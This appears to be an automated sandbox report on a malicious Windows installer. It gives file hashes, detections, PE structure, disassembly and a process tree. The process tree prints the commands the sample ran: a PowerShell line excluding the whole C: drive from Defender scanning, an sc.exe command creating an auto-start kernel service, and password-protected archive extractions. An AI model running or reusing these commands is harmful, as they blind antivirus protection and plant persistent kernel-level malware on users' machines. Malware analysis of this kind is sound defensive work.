                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3621376
                                            Entropy (8bit):7.006090025798393
                                            Encrypted:false
                                            SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                            MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                            SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                            SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                            SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 26%
                                             • Antivirus: Virustotal, Detection: 38%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\yvaKqhmD4L.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3366912
                                            Entropy (8bit):6.530560312986899
                                            Encrypted:false
                                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                            MD5:6AD6576147BC6B91DD40240772510F4F
                                            SHA1:CB2F08863C6B55BE0B2FD9DE6A5E23EA3C970D4A
                                            SHA-256:4C6EAB302E63581D03D10FCC2DBA9BC17CE2320EC374615F5F6FFDDA7FF91928
                                            SHA-512:B9F95CC0B83706AEAEEEE59854402F3D6C8F8418C0AB2534212BFBA117460BA3EEA07DC1A928E204EBFC1F79508A088C5618B33F8B39AE1FF923172E3266363C
                                            Malicious:true
                                            Antivirus:
                                             • Antivirus: Virustotal, Detection: 2%
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):6144
                                            Entropy (8bit):4.720366600008286
                                            Encrypted:false
                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3621376
                                            Entropy (8bit):7.006090025798393
                                            Encrypted:false
                                            SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                            MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                            SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                            SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                            SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 26%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\yvaKqhmD4L.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3366912
                                            Entropy (8bit):6.530560312986899
                                            Encrypted:false
                                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                            MD5:6AD6576147BC6B91DD40240772510F4F
                                            SHA1:CB2F08863C6B55BE0B2FD9DE6A5E23EA3C970D4A
                                            SHA-256:4C6EAB302E63581D03D10FCC2DBA9BC17CE2320EC374615F5F6FFDDA7FF91928
                                            SHA-512:B9F95CC0B83706AEAEEEE59854402F3D6C8F8418C0AB2534212BFBA117460BA3EEA07DC1A928E204EBFC1F79508A088C5618B33F8B39AE1FF923172E3266363C
                                            Malicious:true
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:ASCII text, with CRLF, CR line terminators
                                            Category:dropped
                                            Size (bytes):406
                                            Entropy (8bit):5.117520345541057
                                            Encrypted:false
                                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                            MD5:9200058492BCA8F9D88B4877F842C148
                                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                            Malicious:false
                                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.9395959272699885
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 98.04%
                                            • Inno Setup installer (109748/4) 1.08%
                                            • InstallShield setup (43055/19) 0.42%
                                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                            File name:yvaKqhmD4L.exe
                                            File size:6'745'048 bytes
                                            MD5:17ae5643e60881d69e3e25122ca1fc67
                                            SHA1:ab0e0bec78013e6406148f1dbc527756af31e988
                                            SHA256:def808bed70d77ec70f201b7f9edc125295d26128df9e7e1796311742fc0d00a
                                            SHA512:c824e794281760ebe6a5d3945c09f0df87706a4c253994d111f842ae0b5d93950b9afe40b5f19afd80e7b2e81c4474ad825f61b3d722b0236181da34e9e726b5
                                            SSDEEP:98304:XwREcprT7QWG+nv/e5278iPYuHUtFdghxOdVig1QxqQNDhA62sSZNXbIAdMwZgg:lcp1G+v/e5wXHPmVlQAQNHSZNMG/
                                            TLSH:84661213F2CBD43EF05E0B3B15B2A55484FBBA616922AD5286ECB4ECCE354601D3E647
                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                            Icon Hash:0c0c2d33ceec80aa
                                            Entrypoint:0x4a83bc
                                            Entrypoint Section:.itext
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:1
                                            File Version Major:6
                                            File Version Minor:1
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:1
                                            Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            add esp, FFFFFFA4h
                                            push ebx
                                            push esi
                                            push edi
                                            xor eax, eax
                                            mov dword ptr [ebp-3Ch], eax
                                            mov dword ptr [ebp-40h], eax
                                            mov dword ptr [ebp-5Ch], eax
                                            mov dword ptr [ebp-30h], eax
                                            mov dword ptr [ebp-38h], eax
                                            mov dword ptr [ebp-34h], eax
                                            mov dword ptr [ebp-2Ch], eax
                                            mov dword ptr [ebp-28h], eax
                                            mov dword ptr [ebp-14h], eax
                                            mov eax, 004A2EBCh
                                            call 00007EFC590239A5h
                                            xor eax, eax
                                            push ebp
                                            push 004A8AC1h
                                            push dword ptr fs:[eax]
                                            mov dword ptr fs:[eax], esp
                                            xor edx, edx
                                            push ebp
                                            push 004A8A7Bh
                                            push dword ptr fs:[edx]
                                            mov dword ptr fs:[edx], esp
                                            mov eax, dword ptr [004B0634h]
                                            call 00007EFC590B532Bh
                                            call 00007EFC590B4E7Eh
                                            lea edx, dword ptr [ebp-14h]
                                            xor eax, eax
                                            call 00007EFC590AFB58h
                                            mov edx, dword ptr [ebp-14h]
                                            mov eax, 004B41F4h
                                            call 00007EFC5901DA53h
                                            push 00000002h
                                            push 00000000h
                                            push 00000001h
                                            mov ecx, dword ptr [004B41F4h]
                                            mov dl, 01h
                                            mov eax, dword ptr [0049CD14h]
                                            call 00007EFC590B0E83h
                                            mov dword ptr [004B41F8h], eax
                                            xor edx, edx
                                            push ebp
                                            push 004A8A27h
                                            push dword ptr fs:[edx]
                                            mov dword ptr fs:[edx], esp
                                            call 00007EFC590B53B3h
                                            mov dword ptr [004B4200h], eax
                                            mov eax, dword ptr [004B4200h]
                                            cmp dword ptr [eax+0Ch], 01h
                                            jne 00007EFC590BC09Ah
                                            mov eax, dword ptr [004B4200h]
                                            mov edx, 00000028h
                                            call 00007EFC590B1778h
                                            mov edx, dword ptr [004B4200h]
                                            Name                                  Virtual Address  Virtual Size  Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT          0xb7000          0x71          .edata
                                            IMAGE_DIRECTORY_ENTRY_IMPORT          0xb5000          0xfec         .idata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0xcb000          0x11000       .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0xba000          0x10fa8       .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_TLS             0xb9000          0x18          .rdata
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_IAT             0xb52d4          0x25c         .idata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0xb6000          0x1a4         .didata
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                            Name     Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                                            .text    0x1000           0xa568c       0xa5800   b889d302f6fc48a904de33d8d947ae80  False     0.3620185045317221   data       6.377190161826806   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .itext   0xa7000          0x1b64        0x1c00    588dd0a8ab499300d3701cbd11b017d9  False     0.548828125          data       6.109264411030635   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .data    0xa9000          0x3838        0x3a00    5c0c76e77aef52ebc6702430837ccb6e  False     0.35338092672413796  data       4.95916338709992    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .bss     0xad000          0x7258        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .idata   0xb5000          0xfec         0x1000    627340dff539ef99048969aa4824fb2d  False     0.380615234375       data       5.020404933181373   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .didata  0xb6000          0x1a4         0x200     fd11c1109737963cc6cb7258063abfd6  False     0.34765625           data       2.729290535217263   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .edata   0xb7000          0x71          0x200     7de8ca0c7a61668a728fd3a88dc0942d  False     0.1796875            data       1.305578535725827   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .tls     0xb8000          0x18          0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rdata   0xb9000          0x5d          0x200     d84006640084dc9f74a07c2ff9c7d656  False     0.189453125          data       1.3892750148744617  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc   0xba000          0x10fa8       0x11000   a85fda2741bd9417695daa5fc5a9d7a5  False     0.5789579503676471   data       6.709466460182023   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            .rsrc    0xcb000          0x11000       0x11000   cd57d4944380f39f42e90208620a1dec  False     0.18764361213235295  data       3.722093950297349   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            Name           RVA      Size    Type                                                                                     Language  Country        ZLIB Complexity
                                            RT_ICON        0xcb678  0xa68   Device independent bitmap graphic, 64 x 128 x 4, image size 2048                         English   United States  0.1174924924924925
                                            RT_ICON        0xcc0e0  0x668   Device independent bitmap graphic, 48 x 96 x 4, image size 1152                          English   United States  0.15792682926829268
                                            RT_ICON        0xcc748  0x2e8   Device independent bitmap graphic, 32 x 64 x 4, image size 512                           English   United States  0.23387096774193547
                                            RT_ICON        0xcca30  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 128                           English   United States  0.39864864864864863
                                            RT_ICON        0xccb58  0x1628  Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors   English   United States  0.08339210155148095
                                            RT_ICON        0xce180  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors    English   United States  0.1023454157782516
                                            RT_ICON        0xcf028  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors    English   United States  0.10649819494584838
                                            RT_ICON        0xcf8d0  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors     English   United States  0.10838150289017341
                                            RT_ICON        0xcfe38  0x12e5  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                              English   United States  0.8712011577424024
                                            RT_ICON        0xd1120  0x4228  Device independent bitmap graphic, 64 x 128 x 32, image size 16896                       English   United States  0.05668398677373642
                                            RT_ICON        0xd5348  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9600                         English   United States  0.08475103734439834
                                            RT_ICON        0xd78f0  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224                         English   United States  0.09920262664165103
                                            RT_ICON        0xd8998  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088                         English   United States  0.2047872340425532
                                            RT_STRING      0xd8e00  0x3f8   data                                                                                                              0.3198818897637795
                                            RT_STRING      0xd91f8  0x2dc   data                                                                                                              0.36475409836065575
                                            RT_STRING      0xd94d4  0x430   data                                                                                                              0.40578358208955223
                                            RT_STRING      0xd9904  0x44c   data                                                                                                              0.38636363636363635
                                            RT_STRING      0xd9d50  0x2d4   data                                                                                                              0.39226519337016574
                                            RT_STRING      0xda024  0xb8    data                                                                                                              0.6467391304347826
                                            RT_STRING      0xda0dc  0x9c    data                                                                                                              0.6410256410256411
                                            RT_STRING      0xda178  0x374   data                                                                                                              0.4230769230769231
                                            RT_STRING      0xda4ec  0x398   data                                                                                                              0.3358695652173913
                                            RT_STRING      0xda884  0x368   data                                                                                                              0.3795871559633027
                                            RT_STRING      0xdabec  0x2a4   data                                                                                                              0.4275147928994083
                                            RT_RCDATA      0xdae90  0x10    data                                                                                                              1.5
                                            RT_RCDATA      0xdaea0  0x310   data                                                                                                              0.6173469387755102
                                            RT_RCDATA      0xdb1b0  0x2c    data                                                                                                              1.1818181818181819
                                            RT_GROUP_ICON  0xdb1dc  0xbc    data                                                                                     English   United States  0.6170212765957447
                                            RT_VERSION     0xdb298  0x584   data                                                                                     English   United States  0.273371104815864
                                            RT_MANIFEST    0xdb81c  0x7a8   XML 1.0 document, ASCII text, with CRLF line terminators                                 English   United States  0.3377551020408163
                                            DLL           Import
                                            kernel32.dll  GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                            comctl32.dll  InitCommonControls
                                            user32.dll    CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                            oleaut32.dll  SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                            advapi32.dll  ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                            Name                 Ordinal  Address
                                            __dbk_fcall_wrapper  2        0x40fc10
                                            dbkFCallWrapperAddr  1        0x4b063c
                                            Language of compilation system  Country where language is spoken  Map
                                            English                         United States
                                            No network behavior found

                                            Target ID:0
                                            Start time:01:52:20
                                            Start date:25/12/2024
                                            Path:C:\Users\user\Desktop\yvaKqhmD4L.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\yvaKqhmD4L.exe"
                                            Imagebase:0xd0000
                                            File size:6'745'048 bytes
                                            MD5 hash:17AE5643E60881D69E3E25122CA1FC67
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:01:52:21
                                            Start date:25/12/2024
                                            Path:C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe"
                                            Imagebase:0xb10000
                                            File size:3'366'912 bytes
                                            MD5 hash:6AD6576147BC6B91DD40240772510F4F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Antivirus matches:
                                            • Detection: 2%, Virustotal
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:01:52:21
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                            Imagebase:0x7ff788560000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:01:52:21
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:01:52:25
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff7699e0000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:5
                                            Start time:01:52:29
                                            Start date:25/12/2024
                                            Path:C:\Users\user\Desktop\yvaKqhmD4L.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
                                            Imagebase:0xd0000
                                            File size:6'745'048 bytes
                                            MD5 hash:17AE5643E60881D69E3E25122CA1FC67
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Reputation:low
                                            Has exited:false

                                            Target ID:6
                                            Start time:01:52:30
                                            Start date:25/12/2024
                                            Path:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp" /SL5="$A022E,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
                                            Imagebase:0x7e0000
                                            File size:3'366'912 bytes
                                            MD5 hash:6AD6576147BC6B91DD40240772510F4F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Reputation:low
                                            Has exited:true

                                            Target ID:7
                                            Start time:01:52:31
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:01:52:31
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:01:52:32
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:10
                                            Start time:01:52:32
                                            Start date:25/12/2024
                                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                            Wow64 process (32bit):true
                                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                            Imagebase:0xcf0000
                                            File size:831'200 bytes
                                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            • Detection: 0%, Virustotal
                                            Has exited:true

                                            Target ID:11
                                            Start time:01:52:32
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:12
                                            Start time:01:52:32
                                            Start date:25/12/2024
                                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                            Wow64 process (32bit):true
                                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                            Imagebase:0xcf0000
                                            File size:831'200 bytes
                                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

